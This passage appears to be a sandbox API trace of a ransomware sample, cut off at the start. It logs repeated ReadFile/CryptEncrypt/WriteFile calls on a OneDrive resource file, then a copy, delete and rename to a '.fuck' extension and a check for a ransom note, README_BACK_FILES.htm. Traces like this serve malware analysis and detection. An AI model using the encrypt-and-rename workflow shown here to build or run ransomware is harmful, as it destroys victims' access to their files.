pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.706] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.706] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.706] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.706] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.707] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.707] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.707] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.718] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.719] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.719] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.719] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.719] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.719] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.719] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.719] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.719] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.720] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.720] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.720] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.720] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.720] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.720] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.720] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.720] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.720] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.720] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.720] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.720] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.721] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.721] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.721] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.722] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.722] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.722] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.722] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.722] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.722] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.722] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.722] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.722] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.722] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.722] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.722] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.723] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.723] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.723] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.723] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.723] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.723] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.723] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.723] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.723] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.723] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.724] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.724] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.724] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.724] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.724] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.724] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.724] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.724] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.725] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.725] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.725] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.725] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.725] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.725] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.725] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.725] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.725] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.725] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.725] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.726] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.726] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.726] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.726] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.726] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.726] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.726] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.726] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.726] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.726] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.726] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.726] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.727] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.727] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.727] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.727] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.727] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x150, lpOverlapped=0x0) returned 1 [0271.727] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x150, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x160) returned 1 [0271.727] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x160, lpOverlapped=0x0) returned 1 [0271.727] CloseHandle (hObject=0x5d4c) returned 1 [0271.727] CloseHandle (hObject=0x5d3c) returned 1 [0271.728] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\af\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\af\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0271.735] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0271.738] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\af\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0271.740] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\af\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\af\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0271.742] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0271.742] CryptDestroyKey (hKey=0x2fa4c8) returned 1 [0271.742] CryptReleaseContext (hProv=0x2f27f68, dwFlags=0x0) returned 1 [0271.742] FindNextFileA (in: hFindFile=0x2fa208, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0271.742] FindClose (in: hFindFile=0x2fa208 | out: hFindFile=0x2fa208) returned 1 [0271.742] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\af\\readme_back_files.htm")) returned 0xffffffff [0271.742] 